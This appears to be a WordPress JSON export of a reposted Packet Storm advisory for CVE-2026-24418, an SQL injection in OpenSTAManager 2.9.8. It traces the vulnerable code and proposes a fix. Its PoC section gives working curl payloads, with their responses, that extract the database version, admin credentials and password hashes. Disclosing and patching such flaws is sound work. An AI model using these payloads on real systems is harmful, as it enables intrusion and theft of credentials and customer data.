{"id":46301,"date":"2026-04-13T11:50:30","date_gmt":"2026-04-13T11:50:30","guid":{"rendered":"http:\/\/localhost\/?p=46301"},"modified":"2026-04-13T11:50:30","modified_gmt":"2026-04-13T11:50:30","slug":"openstamanager-298-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=46301","title":{"rendered":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:51:43&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario bulk operations module&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218741&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24418&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-24418: OpenSTAManager has a SQL Injection vulnerability in the Scadenzario bulk operations module\\n    \\n    ## Overview\\n    \\n    | Field | Details |\\n    |&#8212;|&#8212;|\\n    | **CVE ID** | [CVE-2026-24418](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24418) |\\n    | **Severity** | HIGH |\\n    | **Advisory** | [View Advisory](https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-4xwv-49c8-fvhq) |\\n    | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n    \\n    ## Affected Products\\n    \\n    &#8211; **devcode-it\/openstamanager** (versions: \\u003c= 2.9.8)\\n    \\n    \\n    ## CWE Classification\\n    \\n    &#8211; CWE-89: Improper Neutralization of Special Elements used in an SQL Command (&#8216;SQL Injection&#8217;)\\n    \\n    ## Details\\n    \\n    ### Summary\\n    \\n    Critical Error-Based SQL Injection vulnerability in the Scadenzario (Payment Schedule) bulk operations module of OpenSTAManager v2.9.8 allows authenticated attackers to extract complete database contents including user credentials, customer PII, and financial records through XML error messages.\\n    \\n    **Status:** \u2705 Confirmed and tested on live instance (v2.9.8)\\n    **Vulnerable Parameter:** `id_records[]` (POST array)\\n    **Affected Endpoint:** `\/actions.php?id_module=18` (Scadenzario module)\\n    **Attack Type:** Error-Based SQL Injection (IN clause)\\n    \\n    ### Details\\n    \\n    OpenSTAManager v2.9.8 contains a critical Error-Based SQL Injection vulnerability in the bulk operations handler for the Scadenzario (Payment Schedule) module. The application fails to validate that elements of the `id_records` array are integers before using them in an SQL IN() clause, allowing attackers to inject arbitrary SQL commands and extract sensitive data through XPATH error messages.\\n    \\n    **Vulnerability Chain:**\\n    \\n    1. **Entry Point:** `\/actions.php` (Lines 503-506)\\n       &#8220;`php\\n       $id_records = post(&#8216;id_records&#8217;);\\n       $id_records = is_array($id_records) ? $id_records : explode(&#8216;;&#8217;, $id_records);\\n       $id_records = array_clean($id_records);\\n       $id_records = array_unique($id_records);\\n       &#8220;`\\n       The `array_clean()` function only removes empty values &#8211; it does NOT validate types.\\n    \\n    2. **Vulnerable Function:** `\/lib\/util.php` (Lines 54-60)\\n       &#8220;`php\\n       function array_clean($array)\\n       {\\n           if (!empty($array)) {\\n               return array_unique(array_values(array_filter($array, fn ($value) =\\u003e !empty($value))));\\n           }\\n       }\\n       &#8220;`\\n       **Impact:** The function filters out empty values but accepts any non-empty value, including SQL injection payloads.\\n    \\n    3. **SQL Injection Point:** `\/modules\/scadenzario\/bulk.php` (Line 88) **PRIMARY VULNERABILITY**\\n       &#8220;`php\\n       $scadenze = $database-\\u003eFetchArray(&#8216;SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN (&#8216;.implode(&#8216;,&#8217;, $id_records).&#8217;) AND pagato \\u003c da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento&#8217;);\\n       &#8220;`\\n       **Impact:** Array elements from `$id_records` are directly concatenated using `implode()` without type validation or `prepare()`, enabling full SQL injection.\\n    \\n    **Root Cause Analysis:**\\n    \\n    The vulnerability exists because:\\n    1. `post(&#8216;id_records&#8217;)` returns user-controlled array\\n    2. `array_clean()` only removes empty values, not non-integer values\\n    3. `implode(&#8216;,&#8217;, $id_records)` concatenates array elements directly into SQL\\n    4. No validation ensures array elements are integers\\n    5. Attacker can inject SQL by providing: `id_records[]=1\\u0026id_records[]=(MALICIOUS SQL)#`\\n    \\n    **Affected Code Path:**\\n    &#8220;`\\n    POST \/actions.php?id_module=18\\n      \u2193\\n    actions.php:503 &#8211; $id_records = post(&#8216;id_records&#8217;)\\n      \u2193\\n    actions.php:505 &#8211; $id_records = array_clean($id_records) [NO TYPE VALIDATION]\\n      \u2193\\n    actions.php:509 &#8211; include &#8216;modules\/scadenzario\/bulk.php&#8217;\\n      \u2193\\n    bulk.php:88 &#8211; WHERE id IN (&#8216;.implode(&#8216;,&#8217;, $id_records).&#8217;) [INJECTION POINT]\\n    &#8220;`\\n    \\n    ### PoC\\n    \\n    **Step 1: Login**\\n    &#8220;`bash\\n    curl -c cookies.txt -X POST &#8216;http:\/\/localhost:8081\/index.php?op=login&#8217; \\\\\\n      -d &#8216;username=admin\\u0026password=admin&#8217;\\n    &#8220;`\\n    \\n    **Step 2: Verify Vulnerability (Error-Based SQL Injection)**\\n    \\n    **Test 1: Extract Database User and Version**\\n    &#8220;`bash\\n    curl -b cookies.txt \\\\\\n      -d \\&#8221;op=send_reminder\\u0026id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(USER(),&#8217; | &#8216;,VERSION()))))%23\\&#8221; \\\\\\n      \\&#8221;http:\/\/localhost:8081\/actions.php?id_module=18\\&#8221;\\n    &#8220;`\\n    \\n    **Response (error message visible to attacker):**\\n    &#8220;`html\\n    \\u003ccode\\u003eXPATH syntax error: &#8216;~osm@localhost | 8.0.40-0ubuntu0.22.04.1&#8217;\\u003c\/code\\u003e\\n    &#8220;`\\n    \\n    **Test 2: Extract Admin Credentials**\\n    &#8220;`bash\\n    curl -b cookies.txt \\\\\\n      -d \\&#8221;op=send_reminder\\u0026id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,&#8217;:&#8217;,email) FROM zz_users LIMIT 1)))%23\\&#8221; \\\\\\n      \\&#8221;http:\/\/localhost:8081\/actions.php?id_module=18\\&#8221;\\n    &#8220;`\\n    \\n    **Response:**\\n    &#8220;`html\\n    \\u003ccode\\u003eXPATH syntax error: &#8216;~admin:admin@osm.local&#8217;\\u003c\/code\\u003e\\n    &#8220;`\\n    \\n    **Test 3: Extract Password Hash (Part 1 &#8211; first 31 chars)**\\n    &#8220;`bash\\n    curl -b cookies.txt \\\\\\n      -d \\&#8221;op=send_reminder\\u0026id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,1,31) FROM zz_users LIMIT 1)))%23\\&#8221; \\\\\\n      \\&#8221;http:\/\/localhost:8081\/actions.php?id_module=18\\&#8221;\\n    &#8220;`\\n    \\n    **Response:**\\n    &#8220;`html\\n    \\u003ccode\\u003eXPATH syntax error: &#8216;~$2y$10$UUPECY1DhQXm2pGEq\/UNAeMd&#8217;\\u003c\/code\\u003e\\n    &#8220;`\\n    \\n    **Test 4: Extract Password Hash (Part 2 &#8211; chars 32-60)**\\n    &#8220;`bash\\n    curl -b cookies.txt \\\\\\n      -d \\&#8221;op=send_reminder\\u0026id_records[]=-999) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT SUBSTRING(password,32,60) FROM zz_users LIMIT 1)))%23\\&#8221; \\\\\\n      \\&#8221;http:\/\/localhost:8081\/actions.php?id_module=18\\&#8221;\\n    &#8220;`\\n    \\n    **Response:**\\n    &#8220;`html\\n    \\u003ccode\\u003eXPATH syntax error: &#8216;~SoqiRNefN.G9fYMVnCRcvmG0BnwTK&#8217;\\u003c\/code\\u003e\\n    &#8220;`\\n    \\n    **Combined Password Hash:**\\n    &#8220;`\\n    $2y$10$UUPECY1DhQXm2pGEq\/UNAeMdSoqiRNefN.G9fYMVnCRcvmG0BnwTK\\n    &#8220;`\\n    \\n    \\n    ### Impact\\n    \\n    **All authenticated users with access to the Scadenzario (Payment Schedule) module bulk operations.\\n    \\n    **Recommended Fix:**\\n    \\n    **Primary Fix &#8211; Type Validation:**\\n    \\n    File: `\/modules\/scadenzario\/bulk.php`\\n    \\n    **BEFORE (Vulnerable &#8211; Line 88):**\\n    &#8220;`php\\n    $scadenze = $database-\\u003eFetchArray(&#8216;SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN (&#8216;.implode(&#8216;,&#8217;, $id_records).&#8217;) AND pagato \\u003c da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento&#8217;);\\n    &#8220;`\\n    \\n    **AFTER (Fixed):**\\n    &#8220;`php\\n    \/\/ Validate that all array elements are integers\\n    $id_records = array_map(&#8216;intval&#8217;, $id_records);\\n    $id_records = array_filter($id_records, fn($id) =\\u003e $id \\u003e 0); \/\/ Remove zero\/negative IDs\\n    \\n    $scadenze = $database-\\u003eFetchArray(&#8216;SELECT * FROM co_scadenziario LEFT JOIN (SELECT id as id_nota, ref_documento FROM co_documenti)as nota ON co_scadenziario.iddocumento = nota.ref_documento WHERE co_scadenziario.id IN (&#8216;.implode(&#8216;,&#8217;, $id_records).&#8217;) AND pagato \\u003c da_pagare AND nota.id_nota IS NULL ORDER BY idanagrafica, iddocumento&#8217;);\\n    &#8220;`\\n    \\n    ### Credits\\n    Discovered by \u0141ukasz Rybak\\n    \\n    ## References\\n    \\n    &#8211; https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-4xwv-49c8-fvhq\\n    &#8211; https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-24418\\n    &#8211; https:\/\/github.com\/advisories\/GHSA-4xwv-49c8-fvhq\\n    \\n    \\n    ## Disclaimer\\n    \\n    This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/218741&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:8.7,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:N\/VI:H\/SI:N\/VA:H\/SA:N&#8221;,&#8221;version&#8221;:&#8221;4.0&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/218741\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:51:43&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario bulk operations module&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218741&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24418&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-24418: OpenSTAManager has&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,19,12,15,13,53,7,11,5],"class_list":["post-46301","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-87","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=46301\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:51:43&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario bulk operations module&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218741&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24418&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-24418: OpenSTAManager has...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=46301\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-13T11:50:30+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46301#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46301\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741\",\"datePublished\":\"2026-04-13T11:50:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46301\"},\"wordCount\":1296,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-8.7\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46301#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46301\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46301\",\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-04-13T11:50:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46301#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=46301\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=46301#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=46301","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-04-13T15:51:43&#8243;,&#8221;description&#8221;:&#8221;OpenSTAManager versions 2.9.8 and below suffer from a remote SQL injection vulnerability in the Scadenzario bulk operations module&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-04-13T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:218741&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-24418&#8243;],&#8221;sourceData&#8221;:&#8221;# CVE-2026-24418: OpenSTAManager has...","og_url":"https:\/\/zero.redgem.net\/?p=46301","og_site_name":"zero redgem","article_published_time":"2026-04-13T11:50:30+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=46301#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=46301"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741","datePublished":"2026-04-13T11:50:30+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=46301"},"wordCount":1296,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-8.7","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=46301#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=46301","url":"https:\/\/zero.redgem.net\/?p=46301","name":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-04-13T11:50:30+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=46301#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=46301"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=46301#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 OpenSTAManager 2.9.8 SQL Injection_PACKETSTORM:218741"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46301","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=46301"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/46301\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=46301"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=46301"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=46301"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}